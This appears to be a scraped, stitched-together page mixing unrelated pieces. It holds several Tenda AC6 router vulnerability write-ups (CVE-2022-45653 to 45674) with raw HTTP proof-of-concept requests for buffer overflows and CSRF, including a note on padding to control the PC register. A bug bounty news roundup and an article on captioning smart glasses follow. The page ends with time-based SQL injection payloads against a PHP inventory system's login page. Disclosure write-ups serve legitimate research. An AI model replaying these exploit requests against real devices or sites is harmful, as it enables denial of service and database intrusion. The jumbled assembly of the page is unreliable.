Tenda AC6V1.0 V15.03.05.19 was discovered to contain a buffer overflow via the time parameter in the fromSetSysTime function.

Permalink

Cannot retrieve contributors at this time

**Tenda AC6V1.0 V15.03.05.19 was discovered to contain a buffer overflow via the time parameter in the fromSetSysTime function.****Description**

Tenda Router **AC6V1.0 V15.03.05.19** was discovered to contain a buffer overflow in the httpd module when handling /goform/SetSysTimeCfg request.

**Firmware information**

*   Manufacturer's address: https://www.tenda.com.cn/
    
*   Firmware download address : https://www.tenda.com.cn/download/detail-2681.html
    

**Affected version**

**Vulnerability details**

This vulnerability lies in the /goform/SetSysTimeCfg page，The details are shown below:

**POC**

This POC can result in a Dos.

    POST /goform/SetSysTimeCfg HTTP/1.1
    Host: 192.168.204.133
    Content-Length: 710
    Accept: */*
    X-Requested-With: XMLHttpRequest
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    Origin: http://192.168.204.133
    Referer: http://192.168.204.133/parental_control.html?random=0.7058891673130268&
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: password=iqb1qw; bLanguage=cn
    Connection: close
    
    timeType=manual&time=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa-

CVE-2022-45656: CVE-vulns/fromSetSysTime.md at main · Double-q1015/CVE-vulns

Tenda AC6V1.0 V15.03.05.19 was discovered to contain a buffer overflow via the list parameter in the fromSetIpMacBind function.

Permalink

Cannot retrieve contributors at this time

**Tenda AC6V1.0 V15.03.05.19 was discovered to contain a buffer overflow via the list parameter in the fromSetIpMacBind function.****Description**

Tenda Router **AC6V1.0 V15.03.05.19** was discovered to contain a buffer overflow in the httpd module when handling /goform/SetIpMacBind request.

**Firmware information**

*   Manufacturer's address: https://www.tenda.com.cn/
    
*   Firmware download address : https://www.tenda.com.cn/download/detail-2681.html
    

**Affected version**

**Vulnerability details**

This vulnerability lies in the /goform/SetIpMacBind page，The details are shown below:

**POC**

This POC can result in a Dos.

    POST /goform/SetIpMacBind HTTP/1.1
    Host: 192.168.204.133
    Content-Length: 453
    Accept: */*
    X-Requested-With: XMLHttpRequest
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    Origin: http://192.168.204.133
    Referer: http://192.168.204.133/parental_control.html?random=0.7058891673130268&
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: password=iqb1qw; bLanguage=cn
    Connection: close
    
    bindnum=1&list=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBB\n
    

Using A\*428 to padding, we can control PC register

CVE-2022-45657: CVE-vulns/fromSetIpMacBind.md at main · Double-q1015/CVE-vulns

Tenda AC6V1.0 V15.03.05.19 was discovered to contain a buffer overflow via the page parameter in the fromNatStaticSetting function.

CVE-2022-45653: CVE-vulns/fromNatStaticSetting_page.md at main · Double-q1015/CVE-vulns

Tenda AC6V1.0 V15.03.05.19 was discovered to contain a buffer overflow via the ssid parameter in the form_fast_setting_wifi_set function.

Tenda Router **AC6V1.0 V15.03.05.19** was discovered to contain a buffer overflow in the httpd module when handling /goform/fast_setting_wifi_set request.

This vulnerability lies in the /goform/fast_setting_wifi_set page，The details are shown below:

This POC can result in a Dos.

    POST /goform/fast_setting_wifi_set HTTP/1.1
    Host: 192.168.204.133
    Content-Length: 1391
    Accept: */*
    X-Requested-With: XMLHttpRequest
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    Origin: http://192.168.204.133
    Referer: http://192.168.204.133/parental_control.html?random=0.7058891673130268&
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: password=iqb1qw; bLanguage=cn
    Connection: close
    
    ssid=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa

CVE-2022-45654: CVE-vulns/form_fast_setting_wifi_set_ssid.md at main · Double-q1015/CVE-vulns

Tenda AC6V1.0 V15.03.05.19 was discovered to contain a buffer overflow via the timeZone parameter in the form_fast_setting_wifi_set function.

Permalink

Cannot retrieve contributors at this time

**Tenda AC6V1.0 V15.03.05.19 was discovered to contain a buffer overflow via the timeZone parameter in the form\_fast\_setting\_wifi\_set function.****Description**

Tenda Router **AC6V1.0 V15.03.05.19** was discovered to contain a buffer overflow in the httpd module when handling /goform/fast_setting_wifi_set request.

**Firmware information**

*   Manufacturer's address: https://www.tenda.com.cn/
    
*   Firmware download address : https://www.tenda.com.cn/download/detail-2681.html
    

**Affected version**

**Vulnerability details**

This vulnerability lies in the /goform/fast_setting_wifi_set page，The details are shown below:

**POC**

This POC can result in a Dos.

    POST /goform/fast_setting_wifi_set HTTP/1.1
    Host: 192.168.204.133
    Content-Length: 1391
    Accept: */*
    X-Requested-With: XMLHttpRequest
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    Origin: http://192.168.204.133
    Referer: http://192.168.204.133/parental_control.html?random=0.7058891673130268&
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: password=iqb1qw; bLanguage=cn
    Connection: close
    
    ssid=1&timeZone=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa:aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa

CVE-2022-45655: CVE-vulns/form_fast_setting_wifi_set_timeZone.md at main · Double-q1015/CVE-vulns

Tenda AC6V1.0 V15.03.05.19 is vulnerable to Cross Site Request Forgery (CSRF) via function fromSysToolRestoreSet.

Tenda Router **AC6V1.0 V15.03.05.19** is vulnerable to Cross Site Request Forgery (CSRF) via function fromSysToolRestoreSet

This vulnerability lies in the /goform/fromSysToolRestoreSet page，The details are shown below:

This POC can result in a Dos.

    GET /goform/SysToolRestoreSet HTTP/1.1
    Host: 192.168.204.133
    Content-Length: 11525
    Cache-Control: max-age=0
    Upgrade-Insecure-Requests: 1
    Origin: http://192.168.204.133
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Referer: http://192.168.204.133/system_hostname.asp?version=1487847846
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: bLanguage=cn; password=jbl1qw; user=
    Connection: close

CVE-2022-45673: VulnerabilityProjectRecords/fromSysToolRestoreSet.md at main · iceyjchen/VulnerabilityProjectRecords

Tenda AC6V1.0 V15.03.05.19 is vulnerable to Cross Site Request Forgery (CSRF) via function fromSysToolReboot.

Tenda Router **AC6V1.0 V15.03.05.19** is vulnerable to Cross Site Request Forgery (CSRF) via function fromSysToolReboot

This vulnerability lies in the /goform/SysToolReboot page，The details are shown below:

This POC can result in a Dos.

    GET /goform/SysToolReboot HTTP/1.1
    Host: 192.168.204.133
    Content-Length: 11525
    Cache-Control: max-age=0
    Upgrade-Insecure-Requests: 1
    Origin: http://192.168.204.133
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Referer: http://192.168.204.133/system_hostname.asp?version=1487847846
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: bLanguage=cn; password=jbl1qw; user=
    Connection: close

CVE-2022-45674: VulnerabilityProjectRecords/fromSysToolReboot.md at main · iceyjchen/VulnerabilityProjectRecords

New web targets for the discerning hacker

New web targets for the discerning hacker

Bug bounty platform HackerOne has launched a scheme to encourage customers to adopt a standard policy geared towards protecting hackers from potential legal problems.

The Gold Standard Safe Harbor (GSSH) is designed to be “short, broad, \[and\] easily-understood”, according to HackerOne.

Many bug bounty and vulnerability disclosure programs offer safe harbor agreements that allow hackers acting in good faith to do their thing. HackerOne’s standard policy is designed to collate best practices while reducing the administrative burden for hackers, who will have no need to scrutinize the terms and conditions of targets before looking for in-scope vulnerabilities.

European crowdsourced security platform Intigriti, meanwhile, has launched Bug Bounty Calculator, a tool designed to help bug bounty program owners pitch their payout rates at the appropriate level.

To generate reward suggestions program providers select their industry and describe their assets in terms of risk level, maturity level, and incentive curve.

Inti de Ceukelaire, head of hackers at Intigriti, explained why he built the tool: “Anyone can set up a bug bounty program, but if you aren’t sure what you’re doing, you may pay too much for vulnerabilities. Even worse, set your bounties too low and you may not attract any researchers at all.”

The maximum payout awards under a growing number of programs have reached $1 million and more. Earlier this week The Daily Swig took a closer look into these high potential reward programs and discovered that market forces, in particular a scarcity of skilled talent, are driving up the value of rewards offered.

Web 3.0 and crypto platforms, in particular, are competing to offer dazzlingly high potential rewards. However, experts questioned by The Daily Swig pointed out the rarity of firms in this arena actually paying out seven-figure sums, which suggests some are offering enormous potential bounties in an attempt to court publicity.

Against this are several examples of six-figure payouts by more established tech vendors such as Apple and Intel. However, HackerOne reports that the median payouts for critical vulnerabilities comes in at $3,000 – a figure worth bearing in mind by anyone tempted to quit their day job in pursuit of greater riches on the bug bounty circuit.

An example of an interesting flaw on the lower end of the scale dropped early in November when a researcher revealed that they had earned a $250 bug bounty payout after discovering a code injection flaw in Acronis’ cloud management console that could be abused for data theft.

On November 4, ‘Medi’ (under the alias ‘mr-medi’), published a technical analysis of the client-side path traversal flaw, which they described as the “favorite bug” they’d ever found.

**The latest bug bounty programs for December 2022**

The past month saw the arrival of several new bug bounty programs. Here’s a list of the latest entries:

**Abraxas (enhanced)**

**Program provider:  
**Bug Bounty Switzerland

**Program type:  
**Public

**Max reward:  
**CHF 30,000 ($26,167)

**Outline:  
**Abraxas, which provides IT services for the government and public sector in Switzerland, has tripled maximum payouts from 10,000 Swiss francs to 30,000 francs.

**Notes:  
**Program has a particular focus on vulnerabilities that could enable attackers to manipulate the outcome of Swiss elections.

Check out the Abraxas bug bounty page for more details

**Amber AI**

**Program provider:  
**HackerOne

**Program type:  
**Public

**Max reward:  
**$5,000

**Outline:  
**AMBER AI, a “crypto-finance service provider”, is offering between $2,500 and $5,000 for the submission of valid critical bugs.

**Notes:  
**Vulnerabilities in AMBER AI’s core business services qualify for the highest payout tier but the web 3.0 business is also interested in a wide range of web security vulnerabilities such as SQL injection, CSRF, and denial-of-service issues.

Check out the AMBER AI bug bounty page for more details

**Expedia Group**

**Program provider:  
**HackerOne

**Program type:  
**Public

**Max reward:  
**$5,000

**Outline:  
**Expedia runs a portfolio of travel websites that offer hotel, flight booking, and more.

**Notes:  
**A range of targets are in scope including hotels.com. orbitz.com, and expedia.com.

Check out the Expedia Group bug bounty page for more details

**Magic Eden**

**Program provider:  
**HackerOne

**Program type:  
**Public

**Max reward:  
**$2,500

**Outline:  
**Magic Eden styles itself as a community-centric NFT marketplace.

**Notes:  
**The bug bounty program is focused on smart contracts and on guarding against the freezing of funds, direct theft, denial of business function, or other attacks that interfere with the smooth operation of the marketplace.

Check out the Magic Eden bug bounty page for more details

**Teleport**

**Program provider:  
**HackerOne

**Program type:  
**Public

**Max reward:  
**$5,000

**Outline:**

Teleport offers open source technology based around the zero trust model and designed for the administration of servers and cloud-based applications.

**Notes:  
**Vulnerabilities in both the on-premises software and cloud-based versions of Teleport’s technologies fall within the scope of the program.

Check out the Teleport bug bounty page for more details

**ThousandEyes**

**Program provider:  
**Bugcrowd

**Program type:  
**Public

**Max reward:  
**$4,500

**Outline:  
**ThousandEyes, which offers network intelligence software, has invited elite hackers to probe five targets for security flaws.

**Notes:  
**In-scope targets include ThousandEyes' website, application platform, customer-accessible API, and enterprise and agent software. The firm reopened its previously dormant bug bounty program in late November.

Check out the ThousandEyes bug bounty page for more details

**ZeroBounce**

**Program provider:  
**HackerOne

**Program type:  
**Public

**Max reward:  
**$3,000

**Outline:  
**ZeroBounce offers email marketing services, targeted towards the needs of enterprise customers.

**Notes:  
**A broad array of web security vulnerability (such as XSS) on the zerobounce.in domain and flaws in the associated API library (api.zerobounce.in) are within scope.

Check out the ThousandEyes bug bounty page for more details

PREVIOUS EDITION Bug Bounty Radar // The latest bug bounty programs for November 2022

Bug Bounty Radar // The latest bug bounty programs for December 2022

By Habiba Rashid
Meet XRAI Glass, an AI-powered augmented reality smart glasses that gives deaf people the power to see conversations.
This is a post from HackRead.com Read the original post: AI-Powered Smart Glasses Give Deaf People the Power of Speech

In a recent example of innovative technology making a positive difference, there is now new **artificial intelligence (AI)** powered smart glasses that allow deaf people to listen in on real-time conversations by reading subtitles. 

Branded XRAI Glass has developed these glasses using ordinary **augmented reality (AR)** glasses synchronized to a smartphone app with AI-powered software. This latest technology also has the feature to rewind the chat and acts as a personal assistant that remembers what the person might have forgotten. 

Image credit: XRAI Glass

Not only this, but the live captioning app can also translate over nine languages and there are soon more to come in the next few months. The translation takes place near-real time, allowing the wearer to keep up with the conversation. 

**XRAI Glass** co-founder and chief marketing officer Mitchell Feldman referred to it as “Alexa in front of your eyes” which is quite a fitting analogy. 

The idea for this product was inspired by co-founder Dan Scarfe’s 97-year-old grandfather who experienced hearing loss and found it increasingly difficult to participate in family gatherings. 

​​“Where his grandfather came to life the most was watching television and using subtitles,” Feldman said.

He added, “If he enjoys captioning, why can’t we caption his life? And that was the genesis of how this product started.”

1.  **AI-based Model to Predict Extreme Wildfire Danger**
2.  **This AI Can Generate Unique and Free Bored Ape NFTs**
3.  **IRpair & Phantom; powerful anti-facial recognition glasses**
4.  **Anti-facial recognition glasses protect privacy from CCTV cams**
5.  **Apple Glass may feature 3D Audio and Self-Cleaning in new patent**

The standard live captioning app is currently free to download with the assistant on fourteen android smartphone models however, it is not yet compatible with the iPhone. A free version of the app is expected to soon be made available on Apple smartphones, but users will have to pay for premium features themselves. The translation services have to be paid via subscription while the glasses separately cost $484. 

Aside from this, there are some other improvements that are required before the glasses can be fully incorporated into daily life. For example, understanding group conversations can be a struggle with people speaking over each other. Moreover, a fairly quiet environment is a prerequisite for interpreting speech accurately. 

As this exciting innovation advances, we look forward to seeing it enable engagement and participation for those with hearing loss. 

I’m a student and cybersecurity writer. On a random Sunday, I am likely to be figuring out life and reading Kafka.

AI-Powered Smart Glasses Give Deaf People the Power of Speech

Simple Inventory Management System v1.0 is vulnerable to SQL Injection via /ims/login.php.

**Simple Inventory Management System v1.0 by oretnom23 has SQL injection**

BUG\_Author: li-baige

vendors:https://www.sourcecodester.com/php/15419/simple-inventory-management-system-phpoop-free-source-code.html

Vulnerability File: /ims/login.php

Parameter "email" (POST), exists SQL injection vulnerability

Payload1: email=a'&pwd=b&login=

    POST /ims/login.php HTTP/1.1
    Host: localhost
    Origin: http://localhost
    Cookie: PHPSESSID=3gtl0ab587o41bs2nnm02st0ve
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Upgrade-Insecure-Requests: 1
    Referer: http://localhost/ims/login.php
    Content-Type: application/x-www-form-urlencoded
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en-GB;q=0.9,en;q=0.8
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
    Connection: close
    Cache-Control: max-age=0
    Content-Length: 21
    
    email=a'&pwd=b&login=
    

In response to an error

Payload2: email=a''&pwd=b&login=

    POST /ims/login.php HTTP/1.1
    Host: localhost
    Origin: http://localhost
    Cookie: PHPSESSID=3gtl0ab587o41bs2nnm02st0ve
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Upgrade-Insecure-Requests: 1
    Referer: http://localhost/ims/login.php
    Content-Type: application/x-www-form-urlencoded
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en-GB;q=0.9,en;q=0.8
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
    Connection: close
    Cache-Control: max-age=0
    Content-Length: 22
    
    email=a''&pwd=b&login=
    

In response to the right

Payload3: email=a'%2b(select\*from(select(sleep(20)))a)%2b'&pwd=b&login=

    POST /ims/login.php HTTP/1.1
    Host: localhost
    Origin: http://localhost
    Cookie: PHPSESSID=3gtl0ab587o41bs2nnm02st0ve
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Upgrade-Insecure-Requests: 1
    Referer: http://localhost/ims/login.php
    Content-Type: application/x-www-form-urlencoded
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en-GB;q=0.9,en;q=0.8
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
    Connection: close
    Cache-Control: max-age=0
    Content-Length: 61
    
    email=a'%2b(select*from(select(sleep(20)))a)%2b'&pwd=b&login=
    

Response time is 20 seconds

Tag

#apple